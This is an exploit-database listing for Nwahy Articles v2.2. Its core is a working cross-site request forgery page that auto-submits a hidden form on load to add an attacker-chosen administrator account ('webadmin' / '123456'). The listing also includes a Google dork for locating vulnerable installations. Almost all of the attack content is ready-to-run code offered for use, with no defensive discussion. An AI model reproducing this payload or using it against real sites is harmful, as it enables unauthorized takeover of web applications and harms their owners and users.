Nwahy Articles v2.2 CSRF Add Admin

2012-07-20T00:00:00
ID 1337DAY-ID-19033
Type zdt
Reporter DaOne
Modified 2012-07-20T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ##########################################
[~] Exploit Title: Nwahy Articles V2.2 CSRF Add Admin
[~] Author: DaOne
[~] Category: webapps
[~] Software Link: http://www.nwahy.com/upload/article-v2.2.rar
[~] Google dork: intext:"Powered by Nwahy Articles V2.2"
##########################################
 
[#] ~[ Exploit ]~
 
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/admincp/user.php?action=insert">
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="site" value="http://www.nwahy.com"/>
<input type="hidden" name="name" value="..."/>
<input type="hidden" name="groubtype" value="1"/>
</form>
</body>
</html>
 
##########################################



#  0day.today [2018-03-19]  #